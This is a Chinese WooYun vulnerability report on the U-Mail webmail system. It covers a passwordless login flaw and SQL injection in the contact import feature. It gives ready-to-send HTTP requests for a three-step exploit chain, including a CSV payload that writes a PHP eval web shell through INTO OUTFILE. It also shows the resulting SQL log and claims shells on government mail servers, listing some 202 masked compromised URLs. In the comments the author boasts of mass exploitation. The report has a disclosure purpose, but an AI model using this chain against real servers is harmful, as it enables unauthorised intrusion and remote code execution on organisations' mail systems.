当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(96) 关注此漏洞

缺陷编号: WooYun-2015-93049

漏洞标题: U-Mail邮件系统批量getshell(真正无限制,无需普通帐号)

相关厂商: U-Mail

漏洞作者: Ano_Tom认证白帽子

提交时间: 2015-01-23 09:24

公开时间: 2015-04-21 09:26

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

37人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-23: 细节已通知厂商并且等待厂商处理中
2015-01-26: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-21: 细节向公众公开

简要描述:

该邮件系统存在任意用户登录、且存在注入,从而可以无限制完美getshell(getshell过程只需简单三个请求)。疯狗,这个不遭雷劈的话,等着被爆菊吧

详细说明:

1.邮件系统介绍

1)官方下载地址:http://**.**.**.**/html/downloads/

2)版本:最新版V9.8.57

3)测试环境:Windows Server 2003+IIS6.0+官方默认软件

4)使用案例:非常之多,政府类也较多。http://**.**.**.**/html/case/ OR Google "Powered by U-Mail"

漏洞文件

/fast/default/operates.php

code 区域
require_once( LIB_PATH."Mailbox.php" );


require_once( LIB_PATH."Domain.php" );


$Mailbox = Mailbox::getinstance( );


$Domain = Domain::getinstance( );


if ( ACTION == "login" )


{


		$url_success = "index.php";


		$url_failure = "/webmail/";


		$wc_info = array( );


		$wc_info['mailbox'] = strtolower( trim( $_POST['mailbox'] ) );//需要提交的用户名


		$wc_info['link'] = trim( $_POST['link'] );


		$wc_info['charset'] = trim( $_POST['charset'] );


		$wc_info['theme'] = trim( $_POST['theme'] );


		$wc_info['language'] = strtolower( trim( $_POST['language'] ) );


		if ( !$wc_info['link'] )


		{


				redirect( $url_failure, "参数错误!" );


		}


		$url_check = $wc_info['link']."&view=status";


		get_url_data( $url_check );


		list( $username, $domain_name ) = explode( "@", $wc_info['mailbox'] );


		$arr_tmp = $Domain->getDomainByName( $domain_name, "DomainID,DomainName", 0 );//获得域名


		$domain_id = $arr_tmp['DomainID'];


		$userinfo = $Mailbox->getMailboxByName( $domain_id, $username, "UserID,Password,FullName,MailDir,MaxNetFileSpace", 0 );


		$arr_tmp = $Domain->getPurchaseByDomainID( $domain_id, "id,corpname", 0 );


		$company = $arr_tmp['corpname'];


		set_session( "is_login", TRUE );


		set_session( "worldclient", $wc_info );


		set_session( "domain_id", $domain_id );


		set_session( "domain_name", $domain_name );


		set_session( "user_id", $userinfo['UserID'] );


		set_session( "email", $wc_info['mailbox'] );


		set_session( "fullname", $userinfo['FullName'] );


		set_session( "password", $userinfo['Password'] );


		set_session( "maildir", $userinfo['MailDir'] );


		set_session( "company_name", $company );


		set_session( "language", $wc_info['language'] );


		set_session( "username", $username );


		redirect( $url_success );


}



get_url_data()函数文件/admin/include/base.func.php

代码为

code 区域
function get_url_data( $_obfuscate_Il8i, $_obfuscate_5E5Av0svlQÿÿ = 1 )


{


		$_obfuscate_u_cÿ = curl_init( );


		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_URL, $_obfuscate_Il8i );


		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_SSL_VERIFYPEER, FALSE );


		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_SSL_VERIFYHOST, FALSE );


		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_RETURNTRANSFER, TRUE );


		curl_setopt( $_obfuscate_u_cÿ, CURLOPT_CONNECTTIMEOUT, $_obfuscate_5E5Av0svlQÿÿ );


		$_obfuscate_6RYLWQÿÿ = curl_exec( $_obfuscate_u_cÿ );


		curl_close( $_obfuscate_u_cÿ );


		return $_obfuscate_6RYLWQÿÿ;


}



没什么用处,然后

$arr_tmp = $Domain->getDomainByName( $domain_name, "DomainID,DomainName", 0 );代码所在文件为

/admin/lib/Domains.php

代码为

code 区域
public function getDomainByName( $_obfuscate_yTDviRDH, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBwÿ = FALSE )


		{


				$_obfuscate_IRFhnYwÿ = "DomainName='".$_obfuscate_yTDviRDH."'";


				$_obfuscate_6RYLWQÿÿ = $this->getone_domain( $_obfuscate_IRFhnYwÿ, $_obfuscate_tjILu7ZH, $_obfuscate_ySeUHBwÿ );


				return $_obfuscate_6RYLWQÿÿ;


		}



获取域名的id,然后

$userinfo = $Mailbox->getMailboxByName( $domain_id, $username, "UserID,Password,FullName,MailDir,MaxNetFileSpace", 0 );

对应文件为

/admin/lib/Mailbox.php

code 区域
public function getMailboxByName( $_obfuscate_AkPSczrCIu40, $_obfuscate_3gn_eQÿÿ, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBwÿ = FALSE )


		{


				$_obfuscate_AkPSczrCIu40 = intval( $_obfuscate_AkPSczrCIu40 );


				$_obfuscate_IRFhnYwÿ = "DomainID='".$_obfuscate_AkPSczrCIu40."' AND Mailbox='".$_obfuscate_3gn_eQÿÿ."'";


				$_obfuscate_6RYLWQÿÿ = $this->getone_mailbox( $_obfuscate_IRFhnYwÿ, $_obfuscate_tjILu7ZH, $_obfuscate_ySeUHBwÿ );


				return $_obfuscate_6RYLWQÿÿ;


		}



直接使用用户名执行了sql查询,将获取用户查询结果,并未进行password的判断,而直接set_session( "is_login", TRUE );从而登录成功,可以继续执行其他的方法,因而只要找一处缺陷方法即可

a.png



登录成功后,如图,发现是未显示状态,但是函数都是可以执行了,因为有sessionid

b.png



然后,漏洞文件为

/fast/pab/module/o_contact.php 代码为

code 区域
if ( ACTION == "contact-import" )


{


		$url = make_link( "pab", "view", "index" );


		$import_file = $_FILES['import_file'];//获取文件


		$import_group = $_POST['import_group'];


		$import_mode = $_POST['import_mode'];


		$file_path = $_FILES['import_file']['tmp_name'];


		$fp = @fopen( $file_path, "r" );


		if ( !$fp )


		{


				redirect( $url, "无法打开文件!" );


		}


		$i = 0;


		$file_fields = array( );


		while ( !feof( $fp ) )


		{


				$line = iconv( "GBK", "UTF-8", trim( fgets( $fp, 4096 ) ) );


				if ( $i == 0 )


				{


						$field_map = $PAB->getExportFieldMap( );


						$tmp_field_arr = explode( ",", trim( $line ) );


						foreach ( $tmp_field_arr as $tmp_field )


						{


								$tmp_field = trim( $tmp_field );


								$is_find = FALSE;


								foreach ( $field_map as $key => $field )


								{


										if ( !( $tmp_field == $field ) || !( $tmp_field == "\"".$field."\"" ) )


										{


												continue;


										}


										$file_fields[] = $key;


										$is_find = TRUE;


										break;


								}


								if ( !$is_find )


								{


										$file_fields[] = "";


								}


						}


				}


				else


				{


						$data = array( );


						$line_arr = explode( ",", $line );


						foreach ( $line_arr as $j => $val )


						{


								preg_match( "/\"(.+?)\"/", $val, $arr_tmp );


								$val = $arr_tmp[1] ? $arr_tmp[1] : $val;


								if ( !$val && !$file_fields[$j] && !( $val != "\"\"" ) )


								{


										$data[$file_fields[$j]] = $val;//从文件读取的参数存至数组


								}


						}


						if ( !$data )


						{


						}


						else


						{


								$data['updated'] = date( "Y-m-d H:i:s" );


								$contact = $PAB->getContactByMail( $user_id, $data['pref_email'], "contact_id", 0 );//产生注入


								if ( $contact )


								{


										do


										{


												if ( !( $import_mode == "ignore" ) )


												{


														$where = "contact_id='".$contact['contact_id']."'";


														$result = $PAB->update_contact( $data, $where, 0 );


														if ( !$result )


														{


																redirect( $url, "更新数据失败!" );


														}


														if ( $import_group && $PAB->checkMap( $user_id, $import_group, $contact['contact_id'], 0 ) )


														{


																$contact_id = $contact['contact_id'];


																break;


																break;


														}


												}


										}


										else


										{


												$data['user_id'] = $user_id;


												$contact_id = $PAB->add_contact( $data, 0 );


												if ( $contact_id )


												{


														break;


												}


												redirect( $url, "导入数据失败!" );


										} while ( 0 );


								}


								if ( $import_group )


								{


										$res = $PAB->addMap( $user_id, $import_group, $contact_id, 0 );


								}


						}


				}


				++$i;


		}


		fclose( $fp );


		redirect( $url, "导入数据成功!" );


}



getContactByMail函数为/admin/lib/PAB.php

code 区域
public function getContactByMail( $_obfuscate_nQNptTJPgÿÿ, $_obfuscate_ae6UFRQÿ, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBwÿ = FALSE )


		{		//fuck getshell


				$_obfuscate_IRFhnYwÿ = "user_id='".$_obfuscate_nQNptTJPgÿÿ."' AND pref_email='".$_obfuscate_ae6UFRQÿ."'";


				$_obfuscate_6RYLWQÿÿ = $this->getone_contact( $_obfuscate_IRFhnYwÿ, $_obfuscate_tjILu7ZH, $_obfuscate_ySeUHBwÿ );


				return $_obfuscate_6RYLWQÿÿ;


		}



getshell分析见上个漏洞,getshell过程为,找到一个用户名,执行如下

c.png



其请求为

d.png



然后将PHPSESSID放入cookie,执行如下请求即可getshell。exp中的web地址获取方式为访问/webmail/client/mail/module/test.php即可,无需登录,如图,同时该邮件系统的默认数据库连接帐号umail默认是有FILE权限的,从而可以getshell

e.png



code 区域
POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1


Host: **.**.**.**


Proxy-Connection: keep-alive


Content-Length: 814


Cache-Control: max-age=0


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8


Origin: http://**.**.**.**


User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


Content-Type: multipart/form-data; boundary=----WebKitFormBoundary77HSkP3chJHBAPXs


Referer: http://**.**.**.**/webmail/client/pab/index.php?module=view&action=index


Accept-Encoding: gzip, deflate


Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4


Cookie: PHPSESSID=2283f21dcf01afc8c707124764fe6bb6


------WebKitFormBoundary77HSkP3chJHBAPXs


Content-Disposition: form-data; name="import_file"; filename="getshell.csv"


Content-Type: application/vnd.ms-excel


Ãû,µç×ÓÓʼþµØÖ·,Ö÷Òªµç»°,ÉúÈÕ,סլµç»°,ÉÌÎñµç»°,Óû§ 1,Óû§ 2,סլµØÖ· ¹ú¼Ò/µØÇø,סլµØÖ· Ê¡/ÊÐ/×ÔÖÎÇø,סլµØÖ· ÊÐ/ÏØ,סլµØÖ· ½ÖµÀ,סլµØÖ· ÓÊÕþ±àÂë,ÍøÒ³,µ¥Î»,²¿ÃÅ,Ö°Îñ,ÉÌÎñµØÖ· ½ÖµÀ,ÉÌÎñµØÖ· ÓÊÕþ±àÂë,ÉÌÎñ´«Õæ,µç×ÓÓʼþ 2 µØÖ·,µç×ÓÓʼþ 3 µØÖ·,¸½×¢


hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#,,0000-00-00,,,,,,,,,,,,,,,,,,,


------WebKitFormBoundary77HSkP3chJHBAPXs


Content-Disposition: form-data; name="import_group"


15


------WebKitFormBoundary77HSkP3chJHBAPXs


Content-Disposition: form-data; name="import_mode"


ignore


------WebKitFormBoundary77HSkP3chJHBAPXs--



获得执行的sql语句为

code 区域
150121  0:53:08	 1986 Connect	umail@localhost on 


		 1986 Query	SET NAMES 'UTF8'


		 1986 Init DB	umail


		 1986 Query	SELECT contact_id FROM pab_contact WHERE user_id='7' AND pref_email='hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#' LIMIT 1


		 1986 Query	INSERT INTO pab_contact SET `fullname`='hello1',`pref_email`='hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'C:\\umail\\WorldClient\\html\\hahahahaha.php'#',`birthday`='0000-00-00',`updated`='2015-01-21 00:53:08',`user_id`='7'


		 1986 Quit



f.png



所以综上,我们只需要知道一个邮箱用户名即可getshell,那如何批量?只需要找个默认存在的帐号即可,数据库如图

g.png



默认是存在一个system帐号的,安装默认生成的,因而可以直接批量。

h.png



漏洞证明:

批量EXP就不写了吧,

三个请求,一个获得web路径,一个登录获得phpsessionid(system@**.**.**.**即可),一个getshell请求,啥也不提了,随便提交了一个

第一步,获得物理路径请求

code 区域
GET /webmail/client/mail/module/test.php HTTP/1.1


Host: **.**.**.**


User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8


Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3


Accept-Encoding: gzip, deflate


Connection: keep-alive



第二步,请求为,响应中获得PHPSESSID

code 区域
POST /webmail/fast/index.php?module=operate&action=login HTTP/1.1


Host: **.**.**.**


User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8


Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3


Accept-Encoding: gzip, deflate


Connection: keep-alive


Content-Type: application/x-www-form-urlencoded


Content-Length: 30


mailbox=system@**.**.**.**&link=?



第三步,将PHPSESSID和路径写入如下请求,执行getshell EXP即可

code 区域
POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1


Host: **.**.**.**


Proxy-Connection: keep-alive


Content-Length: 553


Cache-Control: max-age=0


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8


Origin: http://**.**.**.**


User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


Content-Type: multipart/form-data; boundary=----WebKitFormBoundary69fA5vmkAMLB8gmA


Accept-Encoding: gzip, deflate


Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4


Cookie: PHPSESSID=53ad27d7a64bd68d372be8a94985606d


------WebKitFormBoundary69fA5vmkAMLB8gmA


Content-Disposition: form-data; name="import_file"; filename="getshell.csv"


Content-Type: application/vnd.ms-excel


Ãû,µç×ÓÓʼþµØÖ·


hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST[1]);' INTO OUTFILE 'c:\\umail\\WorldClient\\html\\shell.php'#


------WebKitFormBoundary69fA5vmkAMLB8gmA


Content-Disposition: form-data; name="import_group"


10


------WebKitFormBoundary69fA5vmkAMLB8gmA


Content-Disposition: form-data; name="import_mode"


ignore


------WebKitFormBoundary69fA5vmkAMLB8gmA--



随便测试了两个

中华人民共和国广东海事局 http://**.**.**.**:3000/webmail/login9.php轻轻松松getshell

广州市民防办公室http://**.**.**.**/webmail/login9.php

v.png



mask 区域
1.http://**.**.**/webmail/anonymous.php_

2.http://**.**.**/webmail/anonymous.php_

3.http://**.**.**/webmail/anonymous.php_

4.http://**.**.**/webmail/anonymous.php_

5.http://**.**.**/webmail/anonymous.php_

6.http://**.**.**/webmail/anonymous.php_

7.http://**.**.**/webmail/anonymous.php_

8.http://**.**.**/webmail/anonymous.php_

9.http://**.**.**/webmail/anonymous.php_

10.http://**.**.**/webmail/anonymous.php_

11.http://**.**.**/webmail/anonymous.php_

12.http://**.**.**/webmail/anonymous.php_

13.http://**.**.**/webmail/anonymous.php_

14.http://**.**.**/webmail/anonymous.php_

15.http://**.**.**/webmail/anonymous.php_

16.http://**.**.**/webmail/anonymous.php_

17.http://**.**.**/webmail/anonymous.php_

18.http://**.**.**/webmail/anonymous.php_

19.http://**.**.**/webmail/anonymous.php_

20.http://**.**.**/webmail/anonymous.php_

21.http://**.**.**/webmail/anonymous.php_

22.http://**.**.**/webmail/anonymous.php_

23.http://**.**.**/webmail/anonymous.php_

24.http://**.**.**/webmail/anonymous.php_

25.http://**.**.**/webmail/anonymous.php_

26.http://**.**.**/webmail/anonymous.php_

27.http://**.**.**/webmail/anonymous.php_

28.http://**.**.**/webmail/anonymous.php_

29.http://**.**.**/webmail/anonymous.php_

30.http://**.**.**/webmail/anonymous.php_

31.http://**.**.**/webmail/anonymous.php_

*****mail/ano*****

32.http://**.**.**/webmail/anonymous.php_

33.http://**.**.**/webmail/anonymous.php_

34.http://**.**.**/webmail/anonymous.php_

35.http://**.**.**/webmail/anonymous.php_

36.http://**.**.**/webmail/anonymous.php_

37.http://**.**.**/webmail/anonymous.php_

38.http://**.**.**/webmail/anonymous.php_

39.http://**.**.**/webmail/anonymous.php_

40.http://**.**.**/webmail/anonymous.php_

41.http://**.**.**/webmail/anonymous.php_

42.http://**.**.**/webmail/anonymous.php_

43.http://**.**.**/webmail/anonymous.php_

44.http://**.**.**/webmail/anonymous.php_

45.http://**.**.**/webmail/anonymous.php_

46.http://**.**.**/webmail/anonymous.php_

47.http://**.**.**/webmail/anonymous.php_

48.http://**.**.**/webmail/anonymous.php_

49.http://**.**.**/webmail/anonymous.php_

50.http://**.**.**/webmail/anonymous.php_

51.http://**.**.**/webmail/anonymous.php_

52.http://**.**.**/webmail/anonymous.php_

53.http://**.**.**/webmail/anonymous.php_

54.http://**.**.**/webmail/anonymous.php_

55.http://**.**.**/webmail/anonymous.php_

56.http://**.**.**/webmail/anonymous.php_

57.http://**.**.**/webmail/anonymous.php_

58.http://**.**.**/webmail/anonymous.php_

59.http://**.**.**/webmail/anonymous.php_

60.http://**.**.**/webmail/anonymous.php_

61.http://**.**.**/webmail/anonymous.php_

62.http://**.**.**/webmail/anonymous.php_

63.http://**.**.**/webmail/anonymous.php_

64.http://**.**.**/webmail/anonymous.php_

65.http://**.**.**/webmail/anonymous.php_

66.http://**.**.**/webmail/anonymous.php_

67.http://**.**.**/webmail/anonymous.php_

68.http://**.**.**/webmail/anonymous.php_

69.http://**.**.**/webmail/anonymous.php_

70.http://**.**.**/webmail/anonymous.php_

71.http://**.**.**/webmail/anonymous.php_

72.http://**.**.**/webmail/anonymous.php_

73.http://**.**.**/webmail/anonymous.php_

74.http://**.**.**/webmail/anonymous.php_

75.http://**.**.**/webmail/anonymous.php_

76.http://**.**.**/webmail/anonymous.php_

77.http://**.**.**/webmail/anonymous.php_

78.http://**.**.**/webmail/anonymous.php_

79.http://**.**.**/webmail/anonymous.php_

80.http://**.**.**/webmail/anonymous.php_

81.http://**.**.**/webmail/anonymous.php_

82.http://**.**.**/webmail/anonymous.php_

83.http://**.**.**/webmail/anonymous.php_

84.http://**.**.**/webmail/anonymous.php_

85.http://**.**.**/webmail/anonymous.php_

86.http://**.**.**/webmail/anonymous.php_

87.http://**.**.**/webmail/anonymous.php_

88.http://**.**.**/webmail/anonymous.php_

89.http://**.**.**/webmail/anonymous.php_

90.http://**.**.**/webmail/anonymous.php_

91.http://**.**.**/webmail/anonymous.php_

92.http://**.**.**/webmail/anonymous.php_

93.http://**.**.**/webmail/anonymous.php_

94.http://**.**.**/webmail/anonymous.php_

95.http://**.**.**/webmail/anonymous.php_

96.http://**.**.**/webmail/anonymous.php_

97.http://**.**.**/webmail/anonymous.php_

98.http://**.**.**/webmail/anonymous.php_

99.http://**.**.**/webmail/anonymous.php_

100.http://**.**.**/webmail/anonymous.php_

101.http://**.**.**/webmail/anonymous.php_

102.http://**.**.**/webmail/anonymous.php_

103.http://**.**.**/webmail/anonymous.php_

104.http://**.**.**/webmail/anonymous.php_

105.http://**.**.**/webmail/anonymous.php_

106.http://**.**.**/webmail/anonymous.php_

107.http://**.**.**/webmail/anonymous.php_

*****mail/ano*****

108.http://**.**.**/webmail/anonymous.php_

109.http://**.**.**/webmail/anonymous.php_

110.http://**.**.**/webmail/anonymous.php_

111.http://**.**.**/webmail/anonymous.php_

112.http://**.**.**/webmail/anonymous.php_

113.http://**.**.**/webmail/anonymous.php_

114.http://**.**.**/webmail/anonymous.php_

115.http://**.**.**/webmail/anonymous.php_

116.http://**.**.**/webmail/anonymous.php_

117.http://**.**.**/webmail/anonymous.php_

118.http://**.**.**/webmail/anonymous.php_

119.http://**.**.**/webmail/anonymous.php_

120.http://**.**.**/webmail/anonymous.php_

121.http://**.**.**/webmail/anonymous.php_

122.http://**.**.**/webmail/anonymous.php_

123.http://**.**.**/webmail/anonymous.php_

124.http://**.**.**/webmail/anonymous.php_

125.http://**.**.**/webmail/anonymous.php_

126.http://**.**.**/webmail/anonymous.php_

127.http://**.**.**/webmail/anonymous.php_

128.http://**.**.**/webmail/anonymous.php_

129.http://**.**.**/webmail/anonymous.php_

130.http://**.**.**/webmail/anonymous.php_

131.http://**.**.**/webmail/anonymous.php_

132.http://**.**.**/webmail/anonymous.php_

133.http://**.**.**/webmail/anonymous.php_

134.http://**.**.**/webmail/anonymous.php_

135.http://**.**.**/webmail/anonymous.php_

136.http://**.**.**/webmail/anonymous.php_

137.http://**.**.**/webmail/anonymous.php_

138.http://**.**.**/webmail/anonymous.php_

139.http://**.**.**/webmail/anonymous.php_

140.http://**.**.**/webmail/anonymous.php_

141.http://**.**.**/webmail/anonymous.php_

142.http://**.**.**/webmail/anonymous.php_

143.http://**.**.**/webmail/anonymous.php_

144.http://**.**.**/webmail/anonymous.php_

145.http://**.**.**/webmail/anonymous.php_

146.http://**.**.**/webmail/anonymous.php_

147.http://**.**.**/webmail/anonymous.php_

148.http://**.**.**/webmail/anonymous.php_

149.http://**.**.**/webmail/anonymous.php_

150.http://**.**.**/webmail/anonymous.php_

151.http://**.**.**/webmail/anonymous.php_

152.http://**.**.**/webmail/anonymous.php_

153.http://**.**.**/webmail/anonymous.php_

154.http://**.**.**/webmail/anonymous.php_

155.http://**.**.**/webmail/anonymous.php_

156.http://**.**.**/webmail/anonymous.php_

157.http://**.**.**/webmail/anonymous.php_

158.http://**.**.**/webmail/anonymous.php_

159.http://**.**.**/webmail/anonymous.php_

160.http://**.**.**/webmail/anonymous.php_

161.http://**.**.**/webmail/anonymous.php_

162.http://**.**.**/webmail/anonymous.php_

163.http://**.**.**/webmail/anonymous.php_

164.http://**.**.**/webmail/anonymous.php_

165.http://**.**.**/webmail/anonymous.php_

166.http://**.**.**/webmail/anonymous.php_

167.http://**.**.**/webmail/anonymous.php_

168.http://**.**.**/webmail/anonymous.php_

169.http://**.**.**/webmail/anonymous.php_

170.http://**.**.**/webmail/anonymous.php_

171.http://**.**.**/webmail/anonymous.php_

172.http://**.**.**/webmail/anonymous.php_

173.http://**.**.**/webmail/anonymous.php_

174.http://**.**.**/webmail/anonymous.php_

175.http://**.**.**/webmail/anonymous.php_

176.http://**.**.**/webmail/anonymous.php_

177.http://**.**.**/webmail/anonymous.php_

178.http://**.**.**/webmail/anonymous.php_

179.http://**.**.**/webmail/anonymous.php_

180.http://**.**.**/webmail/anonymous.php_

181.http://**.**.**/webmail/anonymous.php_

182.http://**.**.**/webmail/anonymous.php_

183.http://**.**.**/webmail/anonymous.php_

184.http://**.**.**/webmail/anonymous.php_

185.http://**.**.**/webmail/anonymous.php_

186.http://**.**.**/webmail/anonymous.php_

187.http://**.**.**/webmail/anonymous.php_

188.http://**.**.**/webmail/anonymous.php_

189.http://**.**.**/webmail/anonymous.php_

190.http://**.**.**/webmail/anonymous.php_

191.http://**.**.**/webmail/anonymous.php_

192.http://**.**.**/webmail/anonymous.php_

193.http://**.**.**/webmail/anonymous.php_

194.http://**.**.**/webmail/anonymous.php_

195.http://**.**.**/webmail/anonymous.php_

196.http://**.**.**/webmail/anonymous.php_

197.http://**.**.**/webmail/anonymous.php_

198.http://**.**.**/webmail/anonymous.php_

199.http://**.**.**/webmail/anonymous.php_

200.http://**.**.**/webmail/anonymous.php_

201.http://**.**.**/webmail/anonymous.php_

202.http://**.**.**/webmail/anonymous.php

修复方案:

登录验证、注入问题、爆路径问题、FILE权限与邮件业务的取舍均衡问题

http://**.**.**.**/s/1gdvipFX 密码: zee5

版权声明:转载请注明来源 Ano_Tom@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-26 08:09

厂商回复:

CNVD确认并复现所述情况,与近期的同个软件漏洞一并后续联系软件生产厂商.同时根据测试用例,将分别下发给多个CNCERT分中心进行协调处置. rank 40

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2015-01-21 10:13 | Smilent ( 实习白帽子 | Rank:38 漏洞数:7 | None)
    1

    你关注的绿帽子帽子 Ano_Tom 发表了漏洞 U-Mail邮件系统批量getshell

    1# 回复此人
  2. 2015-01-21 11:33 | Ano_Tom 认证白帽子 ( 普通白帽子 | Rank:474 漏洞数:47 | Talk is cheap.:)
    1

    @Smilent 在批量 哈哈哈

    2# 回复此人
  3. 2015-01-21 11:54 | Smilent ( 实习白帽子 | Rank:38 漏洞数:7 | None)
    1

    @Ano_Tom 快来一发

    3# 回复此人
  4. 2015-01-21 17:40 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)
    0

    没看到雷,洞主快去买点凡士林

    4# 回复此人
  5. 2015-01-21 19:28 | Ano_Tom 认证白帽子 ( 普通白帽子 | Rank:474 漏洞数:47 | Talk is cheap.:)
    0

    @Smilent 写好批量exp了,你付乌币查看,哈哈哈哈

    5# 回复此人
  6. 2015-01-21 19:28 | Ano_Tom 认证白帽子 ( 普通白帽子 | Rank:474 漏洞数:47 | Talk is cheap.:)
    0

    @ACGT 我更新下,不行就得买了,哈哈

    6# 回复此人
  7. 2015-01-23 13:28 | Ano_Tom 认证白帽子 ( 普通白帽子 | Rank:474 漏洞数:47 | Talk is cheap.:)
    0

    getshell的exp请查看测试代码,这就被雷劈了。。。 :)

    7# 回复此人
  8. 2015-01-23 21:23 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)
    0

    NB!

    8# 回复此人
  9. 2015-01-26 09:02 | ki11y0u ( 普通白帽子 | Rank:140 漏洞数:28 | 好好学习,求带飞 ~~~~~~~~~~~~~~~~~~~~~~...)
    0

    @Ano_Tom 40rank啊,叼~

    9# 回复此人
  10. 2015-01-29 09:45 | 无力落地の白 ( 实习白帽子 | Rank:48 漏洞数:19 | 新人)
    0

    6666666

    10# 回复此人
  11. 2015-03-08 20:47 | 1c3z ( 普通白帽子 | Rank:297 漏洞数:63 | @)!^)
    0

    哎呀,用py写这个洞的poc写的好纠结 后来换成gbk编码就好了。。。

    11# 回复此人
  12. 2015-03-08 22:52 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    太厉害了!

    12# 回复此人
  13. 2015-03-11 21:15 | Ano_Tom 认证白帽子 ( 普通白帽子 | Rank:474 漏洞数:47 | Talk is cheap.:)
    0

    @疯狗 这些都是shell 不只是echo了987654321,echo语句下还有个eval一句话,还是打下mask吧

    13# 回复此人
  14. 2015-03-11 22:35 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    @Ano_Tom 一下入侵了那么多邮件系统

    14# 回复此人
  15. 2015-03-11 22:55 | Ano_Tom 认证白帽子 ( 普通白帽子 | Rank:474 漏洞数:47 | Talk is cheap.:)
    0

    @U神 url都没跑完我就给停了,跑差不多一半哈哈。。。

    15# 回复此人
  16. 2015-03-13 19:25 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    @Ano_Tom 搞定

    16# 回复此人
  17. 2015-04-21 16:38 | 开心一下1313 ( 实习白帽子 | Rank:75 漏洞数:24 | 喝口水,压压惊......)
    0

    膜拜!

    17# 回复此人
  18. 2015-04-21 16:51 | sql小神 ( 实习白帽子 | Rank:56 漏洞数:13 | 有些漏洞可以提,有些漏洞不可以提。)
    0

    18# 回复此人
  19. 2015-04-22 09:29 | 萨瓦迪卡 ( 普通白帽子 | Rank:128 漏洞数:21 | 黑太子)
    0

    怒赞

    19# 回复此人
  20. 2015-04-22 18:10 | Seven.Sea ( 普通白帽子 | Rank:118 漏洞数:28 | 唯有安全与美食不可辜负。)
    0

    厉害厉害=w=

    20# 回复此人
  21. 2015-04-23 01:04 | Arthur ( 实习白帽子 | Rank:85 漏洞数:35 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~)
    0

    这个分析牛X啊!审计牛!

    21# 回复此人

登录后才能发表评论,请先 登录